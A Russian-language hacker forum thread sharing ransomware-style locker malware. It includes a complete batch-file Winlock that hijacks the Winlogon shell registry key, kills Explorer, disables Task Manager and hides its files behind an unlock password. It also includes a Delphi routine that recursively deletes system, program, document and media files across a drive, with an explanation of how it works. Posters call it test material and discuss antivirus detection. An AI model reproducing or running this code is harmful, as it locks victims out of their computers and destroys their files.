Простенький Trojan.Winlock на делфи

[X-Shar]

В качестве бонуса выкладываю батник блокера, лочить кстати должен и безопасный режим, пароль разблокировки Blondy Hacker:

[HIDE=10]

Скопировать в буфер обмена

@echo off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус...
title Внимание!!!
CHCP 866
IF EXIST C:\windows\boot.bat (
goto ok )
cls
IF NOT EXIST C:\windows\boot.bat (
ECHO Windows Registry Editor Version 5.00 >> C:\0.reg
ECHO. >> C:\0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg
ECHO. >> C:\0.reg
ECHO "Shell"="Explorer.exe, C:\\windows\\boot.bat " >> C:\0.reg
start/wait regedit -s C:\0.reg
del C:\0.reg
ECHO @echo off >>C:\windows\boot.bat
ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
ECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat
ECHO start sys.bat >>C:\windows\boot.bat
attrib +r +a +s +h C:\windows\boot.bat
copy virus.bat c:\windows\sys.bat
attrib +r +a +s +h C:\windows\sys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
echo %pas%
set /a choise = 0
set /p choise=%pass%:
if "%choise%" == "101" goto gold
if "%choise%" == "Blondy Hacker" goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:\windows\boot.bat
del C:\windows\boot.bat
attrib -r -a -s -h C:\windows\sys.bat
del C:\windows\sys.bat
cls
:gold
start C:\
:end

[/HIDE]

И ещё про батники, вот интересная статья:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

 

[BioNIX]

Это профессиональный локер, достаточно современный, возможно раньше даже продавался.

Там в папке было много другого хлама, конвертер и прочие файлы которые тестились при запусках, и выдавали ошибки, этот локер писался очень долго и с ним проводилось очень много експирементов, о чем говорят файлы сохраненные в папке, но я так думаю, что это все еще на доработку и можно его доработать идеально и все лишнее убрать оттуда, только один компиляционный файл в ехе.

 

[X-Shar]

Там в папке было много другого хлама, конвертер и прочие файлы которые тестились при запусках, и выдавали ошибки, этот локер писался очень долго и с ним проводилось очень много експирементов, о чем говорят файлы сохраненные в папке, но я так думаю, что это все еще на доработку и можно его доработать идеально и все лишнее убрать оттуда, только один компиляционный файл в ехе.

Ну так это я с ним эксперементы проводил !

Тым выложен исходник на Делфи, а так для работы и запуска нужен всего один файл project1.exe, можешь его переименовать и переместить куда-либо, везде будет запускаться !

Ну и я надеюсь понятно, что я выложил это просто для ознакомления с работой таких программ и для теста защиты на виртуалке, надеюсь понятно что это всего-лишь тестовый блокер ! ;)

 

[X-Shar]

И ещё если глянете исходник, там много чего интересного, вот например функция удаления файлов с диска:
[HIDE=10]

Скопировать в буфер обмена

function KillFiles (Dir: AnsiString): boolean;
var
  Sr: SysUtils.TSearchRec;
begin
{$I-}
  if (Dir <> '') and (Dir[length(Dir)] = '\') then
	Delete(Dir, length(dir), 1);
  if FindFirst(Dir + '\*.*', faDirectory + faHidden + faSysFile +
	faReadonly + faArchive, Sr) = 0 then
	repeat
	  if (Sr.Name = '.') or (Sr.Name = '..') then
		continue;
	  if (Sr.Attr and faDirectory <> faDirectory) then
	  
   begin
if AnsiLowerCase(ExtractFileExt(sr.Name)) = '.sys' then
 begin
		FileSetReadOnly(Dir + '\' + sr.Name, False);
		DeleteFile(Dir + '\' + sr.Name);
 end;
if AnsiLowerCase(ExtractFileExt(sr.Name)) = '.dll' then
 begin
		FileSetReadOnly(Dir + '\' + sr.Name, False);
		DeleteFile(Dir + '\' + sr.Name);
 end;
if AnsiLowerCase(ExtractFileExt(sr.Name)) = '.exe' then
 begin
		FileSetReadOnly(Dir + '\' + sr.Name, False);
		DeleteFile(Dir + '\' + sr.Name);
 end;
if AnsiLowerCase(ExtractFileExt(sr.Name)) = '.reg' then
 begin
		FileSetReadOnly(Dir + '\' + sr.Name, False);
		DeleteFile(Dir + '\' + sr.Name);
 end;
if AnsiLowerCase(ExtractFileExt(sr.Name)) = '.avi' then
 begin
		FileSetReadOnly(Dir + '\' + sr.Name, False);
		DeleteFile(Dir + '\' + sr.Name);
 end;
if AnsiLowerCase(ExtractFileExt(sr.Name)) = '.mp3' then
 begin
		FileSetReadOnly(Dir + '\' + sr.Name, False);
		DeleteFile(Dir + '\' + sr.Name);
 
 end;
 
 if AnsiLowerCase(ExtractFileExt(sr.Name)) = '.rar' then
 begin
		FileSetReadOnly(Dir + '\' + sr.Name, False);
		DeleteFile(Dir + '\' + sr.Name);
 
 end;
 if AnsiLowerCase(ExtractFileExt(sr.Name)) = '.mp4' then
 begin
		FileSetReadOnly(Dir + '\' + sr.Name, False);
		DeleteFile(Dir + '\' + sr.Name);
 
 end;
 
 if AnsiLowerCase(ExtractFileExt(sr.Name)) = '.doc' then
 begin
		FileSetReadOnly(Dir + '\' + sr.Name, False);
		DeleteFile(Dir + '\' + sr.Name);
 
 end;
if AnsiLowerCase(ExtractFileExt(sr.Name)) = '.txt' then
 begin
		FileSetReadOnly(Dir + '\' + sr.Name, False);
		DeleteFile(Dir + '\' + sr.Name);
 
 end
   end
	  else
		KillFiles(Dir + '\' + sr.Name);
	until FindNext(sr) <> 0;
  FindClose(sr);
end;

[/HIDE]

Что она делает, это цикл, пока есть файлы на диске, т.е. строчка until FindNext(sr) <> 0;, а далее идёт просто удаление файлов стандартным средством, причём удаление по типам:

Пример, удаляет текстовые файлы:
[HIDE=10]if AnsiLowerCase(ExtractFileExt(sr.Name)) = '.txt' then
begin
FileSetReadOnly(Dir + '\' + sr.Name, False);
DeleteFile(Dir + '\' + sr.Name);
end[/HIDE]

И ещё переход по каталогам, тут так хитро сделан, в начале идёт такая проверка:

Скопировать в буфер обмена

 if (Dir <> '') and (Dir[length(Dir)] = '\') then

Если истина, удаление файлов, если-же условие не выполняется, то просто функия меняет параметры:

Скопировать в буфер обмена

KillFiles(Dir + '\' + sr.Name);

В этоге будет переходы по папкам, классно сделано !

 

[BioNIX]

Ну так это я с ним эксперементы проводил !

Я с ним тоже провел эксперимент, отдал на съедение антивирусу, если защита в DrWeb не сработала и он его пропустил, то ESS его при распаковке сразу грохнул, хотя проверял вопреки всему на основной системе. И желательно его скрыть под хайд за очень много сообщений, ведь детки всякие бывают, и многим нужны читы, там на ютубе как раз есть серия уроков о школоло которые стремятся играть с читами, во избежание его попадания в сеть лучше его отлично прикрыть и спрятать.

 

[X-Shar]

Ну так многие просто не смогут откомпилировать, ведь это нужно ставить Делфи разбераться с ней, школо-хакеры хотят всё на халяву, поэтому потыркаются и забросят эту затею, а тот кто сможет поменять исходник под себя, навряд-ли будет его кому-то подсовывать, да и хайд не оградит их от этого !

Данный исходник уже в паблике, я здесь принципиально не выкладываю ничего из привата, дабы не было проблем, да и ресурс здесь не для взлома, а на оборот для защиты и тестирования защиты, ну нужно понимать, что такие вещи запускать надо с особой осторожностью и на виртуальных системах продвинутым и более-менее грамотным пользователям, дабы не навредить системе !

 

[BioNIX]

И ещё если глянете исходник, там много чего интересного, вот например функция удаления файлов с диска:

Спойлер

***Скрытый текст***

Что она делает, это цикл, пока есть файлы на диске, т.е. строчка until FindNext(sr) <> 0;, а далее идёт просто удаление файлов стандартным средством, причём удаление по типам:

Пример, удаляет текстовые файлы:
***Скрытый текст***

И ещё переход по каталогам, тут так хитро сделан, в начале идёт такая проверка:

Скопировать в буфер обмена

 if (Dir <> '') and (Dir[length(Dir)] = '\') then

Если истина, удаление файлов, если-же условие не выполняется, то просто функия меняет параметры:

Скопировать в буфер обмена

KillFiles(Dir + '\' + sr.Name);

В этоге будет переходы по папкам, классно сделано !

Примерно в 2005 году, я поймал такой вирус, что к чему бы не притронулся все удалялось, а нажал правым кликом на раб столе обновить, и все ярлыки исчезли, в то время стоял аваст 4,8 в паре с нод32 и вот такой вирусик был пропущен, благо понял что дела обстоят плохо, сразу ребут и переустановка системы, снес систему и запустил утилиты проверки памяти и всех остальных файлов, сканирование заняло очень много времени, много чего потерял, но систему переустановил, и с тех пор не использовал эти антивирусы, только теперь недавно установил ESS и он в многом вырос в своих способностях и защите системы, много чего добились разрабы, но и есть антивири с которыми работал длительное время и которым могу доверить более чем 85%, а в целом не полностью им доверяю

 

[X-Shar]

А вот интересно если этот локер попадёт в антивирусные лабы, как они к этому отнесутся, только сейчас понял что там на картинке изображён палевный адрес этого форума, хоть и видно, что локер тестовый и там уже написан пароль разблокировки, ну всё-равно, не залочат-ли ресурс ?

Хотя наверное если-бы хотели уже-бы залочили, а так даже Нортон с Каспером сказали что ресурс чистый !

Просто не приятно, когда не за что лочат, при том, что реально опасным и фишинговым сайтам часто вообще ничего не делают !

 

[BioNIX]

X-Shar, Ну это не так чтоб совсем он был один, без кодов и всего прочего, и как бы оговаривалось, что DrWeb не реагирует на него, а вот ESS его скушал, но и как бы провели тест на заразу и ее распознание, это не то что выставлен готовый продукт в сеть, но там есть и вся компиляция для его продолжения и его создания, это плохо, ведь умеющий ламер может его довести до ума и готовности, хоть и без этого он может и сам прекрасно написать более стремный нежели этот. А в сети этих локеров валом, переживать не стоит думаю.

 

[Антоха]

Что касается upO, решил его немного пробить, любит зелёненькое и крепкое словцо...

Олег,так ты знаком с upO?Я тебя уже спрашивал,но ты не ответил,наверное это секрет:)Интересно под каким ником ты ходишь на хак-ресурсах...а может ты сам upO???
P.S.Мир тесен,X-Олег:)